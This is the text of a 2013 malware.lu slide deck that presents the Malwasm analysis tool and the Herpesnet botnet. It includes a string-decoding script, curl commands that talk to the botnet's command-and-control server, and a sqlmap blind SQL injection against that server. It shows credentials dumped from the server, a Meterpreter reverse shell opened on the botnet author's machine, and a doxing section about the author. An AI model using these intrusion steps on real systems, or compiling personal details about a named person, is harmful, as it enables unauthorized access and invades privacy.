Upload
lycong
View
213
Download
0
Embed Size (px)
Citation preview
Malware.lu overview Malwasm Herpesnet
Our tool and how one of our analysis was
nominated to the DEFCON pwnie awards
@r00tbsd - Paul Rascagneres
malware.lu
February 2013
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet
Plan
1 Malware.lu overviewIntroductionSome numbersScreenshots
2 MalwasmPresentationDemo
3 HerpesnetIntroductionAnalysisC&CPown the C&CDoxingConclusion
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Some numbers Screenshots
Introduction
Presentation of the project malware.lu.Mainteners list:
@r00tbsd - Paul Rascagneres@y0ug - Hugo CaronDefane - Stephane EmmaMiniLX - Julien Maladrie
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Some numbers Screenshots
Some numbers
The project in numbers:
4,799,918 Samples
30 articles
complete analysis of Red October or Rannoh
1400 users
1582 followers on twitter (@malwarelu)
7GB in database
3TB of malwares
1 malware analysis tool released: malwasm
business (reverse engineering, CERT...)
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Some numbers Screenshots
Malware.lu screenshot
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Some numbers Screenshots
Malware.lu screenshot
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Presentation Demo
Malwasm presentation
Malwasm is a opensource tool to help reverse engeener.
Malwasm is based on Cuckoo Sandbox.
Malwasm can be donwload here:http://code.google.com/p/malwasm/
A online demo is available here: http://malwasm.com(be patient with the server...)
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Presentation Demo
Malwasm presentation
Malwasm step by step:
The malware to analyse is executed in a virtual machine withcuckoo sandbox
All activities of the sample is stored in a database (Postgres)
a webservice is started to provide data stored in the database
the user uses his browser to visualize the data
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Presentation Demo
Malwasm presentation
The activity of the malware is get by a Pintool devlopment.Activities stored in the database:
Register values
flags values
instuctions
stack
heap
data
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Presentation Demo
Malwasm presentation
DEMO
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Introduction
One of our user send us the sample of a botnet called herpesnet.Sample hash is: db6779d497cb5e22697106e26eebfaa8.
We decided to make an analysis of this sample.The sample is available here :http://www.malware.lu/_search.php?md5=db6779d497cb5e22697106e26eebfaa8
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Config
The malware is not packed, we are interested to decode theconfiguration of the malware
sub 406FC0 (initVariable) Explanation
This part are in charge to decodeall strings
The decode function (sub_403034)is used to decode string stored inECX.
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Decoder
Script to decode the strings:1 #!/ us r / b i n / env python2 import s y s3 de f decode ( s r c ) :4 r = ””5 f o r c i n s r c :6 c = ord ( c )7 i f c < 0x61 or c > 0x7a :8 i f c < 0x41 or c > 0x5a :9 r += chr ( c )
10 cont i nue11 x = ( ( c − 0x41 ) % 0x1a ) + 0x4112 e l s e :13 x = ( ( c − 0x54 ) % 0x1a ) + 0x6114 r += chr ( x )15 r e t u r n r16 de f main ( ) :17 i f l e n ( s y s . a r gv ) != 2 :18 s y s . e x i t ( 1 )19 f = open ( s y s . a r gv [ 1 ] , ’ rb ’ )20 f . s e e k (0 x1ae88 , 0)21 data = f . r e ad (0 x32 f )22 f o r d i n data . s p l i t ( ”\0” ) :23 i f l e n ( d ) == 0:24 cont i nue25 p r i n t ”%s : %s ” % (d , decode (d ) )26 i f name == ” ma i n ” :27 main ( )
decode.py@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Decoder
Execution of the script
1 y0ug@malware . l u : ˜/ he rpe s$ python decode−a l l . py db6779d497cb5e22697106e26eebfaa82 t c e r f h y g y : g p r e s u l t l3 3 . 0 : 3 . 04 uggc : // qq . mrebkpbqr . arg / u r e c a rg / : h t tp : // dd . z e roxcode . ne t / he rpne t /5 74978 o6rpp6p19836n17n3p2pq0840o0 : 74978 b6ecc6c19836a17a3c2cd0840b06 uggc : // j j j . mrebkpbqr . arg / u r e c a rg / : h t tp : //www. ze roxcode . ne t / he rpne t /7 sgc . mrebkpbqr . arg : f t p . z e roxcode . ne t8 uggc : // sex7 . z va r . ah/ u r e c a rg / : h t tp : // f r k 7 . mine . nu/ he rpne t /9 hcybnq@mrebkpbqr . arg : up load@ze roxcode . ne t
10 hccvg : u pp i t11 u j s d s dbbng f g j h huug f g f u j d : hwfqfqooat s twuuhht s tshwq12 r f f ggghooo : e s s t t t u bbb13 Ashfurncsmx : A fushe ap f zk
decode.bash
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C contact
The function used to build the request to the C&C issub_4059E0 (buildReq).
Call buildreq buildreq
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C contact
The POST request looks like this:userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0
&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none
&vidinfo=none&laninf=none&id=23724
The field ”id” is not required, if it not set the post request return a id to
the bot:
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C contact
USER-AGENT
The C&C check the user agent value. It must be equal to74978b6ecc6c19836a17a3c2cd0840b0.
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C contact
An example of curl command line to send information to the C&C:
1 y0ug@malware . l u : ˜/ he rpe s$ c u r l −A \2 74978 b6ecc6c19836a17a3c2cd0840b0 \3 −d ” use r andpc=foo&admin=1&os=WindowsXP&hwid=2&owner id =12345& v e r s i o n =3.0”\4 ”&ram in fo=256&c pu i n f o=p1&h d i s k i n f o=12GO&upt ime=3600&mining=0&p i n f o=none ”\5 ”&v i d i n f o=none&l a n i n f=none&i d=23724 ”\6 ht tp : //www. ze roxcode . ne t / he rpne t / run . php
curl.bash
An example of curl command line to upload a file to the C&C:
1 y0ug@malware . l u : ˜/ he rpe s$ c u r l −F u p f i l e=@te s t . j pg −A \2 74978 b6ecc6c19836a17a3c2cd0840b0 \3 ht tp : //www. ze roxcode . ne t / he rpne t / up l oads / upp i t . php4 F i l e c a r i c a t o co r r e t t amente
curl2.bash
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 1
By curiosity we tried to find SQLi on the URL:http://www.zeroxcode.net/herpnet/run.php.
1 P l ac e : POST2 Paramete r : i d3 Type : AND/OR time−based b l i n d4 T i t l e : MySQL > 5 . 0 . 1 1 AND time−based b l i n d5 Payload : u se r andpc=foo&admin=1&os=WindowsXP&hwid=2&owner id =123456 &v e r s i o n =3.0& ram in fo=256&c pu i n f o=p1&h d i s k i n f o=12GO7 &upt ime=3600&mining=0&p i n f o=none&v i d i n f o=none&l a n i n f=none8 &i d =23724 ’ AND SLEEP(5) AND ’PtaQ’= ’PtaQ9 −−−
1011 [ 0 8 : 2 2 : 4 1 ] [ INFO ] the back−end DBMS i s MySQL12 web s e r v e r op e r a t i n g system : Windows 200813 web a p p l i c a t i o n t e chno l ogy : ASP .NET, M i c r o s o f t I I S 7 . 5 , PHP 5 . 3 . 1 014 back−end DBMS: MySQL 5 . 0 . 1 1
sqlmap
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 1
With the SQLi we extract the tables names:
1 Database : he rpne t2 [7 t a b l e s ]3 +−−−−−−−−−−+4 | c l i e n t s |5 | c l i n f o |6 | commands |7 | h t i c k e t s |8 | hu s e r s |9 | paypa l t |
10 | up l oads |11 +−−−−−−−−−−+
database
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 1
And we extract the username and password of the malware’sauthor.
1 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+2 | i d | username | password |3 |−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−|4 | 1| Frk7 |6 e6bc4e49dd477ebc98e f4046c067b5 f |5 +−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+
username
After a simple Google search:
1 6 e6bc4e49dd477ebc98e f4046c067b5 f : c i a o
password
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C interface
C&C login page
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C interface
C&C panel page
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C interface
C&C option
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
C&C interface
Bot information
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 2
We saw that the developer use a machine calledFrk7Test@FRK7TEST-D6E0BD.
We used his own functionnality to execute a meterpreter to itsworkstation.
Meterpreter
1 msf e x p l o i t ( h and l e r ) > e x p l o i t23 [∗ ] S t a r t e d r e v e r s e h and l e r on 94 . 2 1 . 2 00 . 6 3 : 4 4444 [∗ ] S t a r t i n g the pay l oad hand l e r . . .5 [∗ ] Sending s tage (752128 byt e s ) to 151 . 63 . 47 . 1776 [∗ ] Me te rp r e t e r s e s s i o n 1 opened ( 94 . 2 1 . 2 00 . 6 3 : 4 444 −> 151 . 6 3 . 4 7 . 1 77 : 5 3574 )7 me t e r p r e t e r > s c r e e n s ho t8 Sc r e enshot saved to : /home/y0ug / s r c /msf3 /PtPVDrKD . jpe g9
10 me t e r p r e t e r > s y s i n f o11 System Language : i t I T12 OS : Windows XP ( Bu i l d 2600 , S e r v i c e Pack3 ) .13 Computer : FRK7TEST−D6E0BD14 A r c h i t e c t u r e : x8615 Me te rp r e t e r : x86 /win3216 me t e r p r e t e r >
meterpreter–1@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 2
meterpreter
1 me t e r p r e t e r > l s2 L i s t i n g : C:\Documents and S e t t i n g s\Frk7Test\Desktop\Herpes4Un3 =============================================================4 Mode S i z e Type Las t mod i f i e d Name5 −−−− −−−− −−−− −−−−−−−−−−−−− −−−−6 40777/ rwxrwxrwx 0 d i r Mon May 21 15 : 26 : 37 +0200 2012 .7 40777/ rwxrwxrwx 0 d i r Mon May 21 15 : 37 : 07 +0200 2012 . .8 40777/ rwxrwxrwx 0 d i r Mon May 21 14 : 53 : 32 +0200 2012 Debug9 40777/ rwxrwxrwx 0 d i r Mon May 21 16 : 06 : 41 +0200 2012 Herpes
10 100666/ rw−rw−rw− 890 f i l Mon May 07 20 : 42 : 22 +0200 2012 Herpes . s l n11 100666/ rw−rw−rw− 167424 f i l Mon May 21 16 : 14 : 06 +0200 2012 Herpes . suo12 40777/ rwxrwxrwx 0 d i r Mon May 21 16 : 15 : 12 +0200 2012 Re l e a se13 100777/ rwxrwxrwx 134 f i l Mon May 07 20 : 42 : 12 +0200 2012 c l e a n . bat14 100666/ rw−rw−rw− 134 f i l Mon May 07 20 : 42 : 22 +0200 2012 roba da f a r e . t x t1516 me t e r p r e t e r > download −r Herpes . /17 [∗ ] downloading : Herpes\ant i debug . h −> . // ant i debug . h18 [∗ ] downloaded : Herpes\ant i debug . h −> . // ant i debug . h19 [∗ ] m i r r o r i n g : Herpes\base64 −> . // base6420 [∗ ] downloading : Herpes\base64\base64 . c −> . // base64 / base64 . c21 [∗ ] downloaded : Herpes\base64\base64 . c −> . // base64 / base64 . c22 [∗ ] downloading : Herpes\base64\base64 . h −> . // base64 / base64 . h
meterpreter–2
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Pown the C&C - Part 2
screenshot
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
We realised some search to identify the maintener of the botnet.We had his pseudo: frk7.
Real name
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
Facebook account
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
Picasa account
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
Twitter account
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
Hacking repository
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Doxing
We found :
His real name : Francesco P*
4 email adress
1 skype account
1 facebook account
1 twitter account
1 picasa account
The town where he lives ;)
a picture of his girlfriend...
@r00tbsd - Paul Rascagneres Malware.lu overview
Malware.lu overview Malwasm Herpesnet Introduction Analysis C&C Pown the C&C Doxing Conclusion
Conclusion
Manage a botnet and putpersonal data on the Internet isnot a wonderful idea.
Without huge ressources weeasily identified the manager ofan illegal activity.
@r00tbsd - Paul Rascagneres Malware.lu overview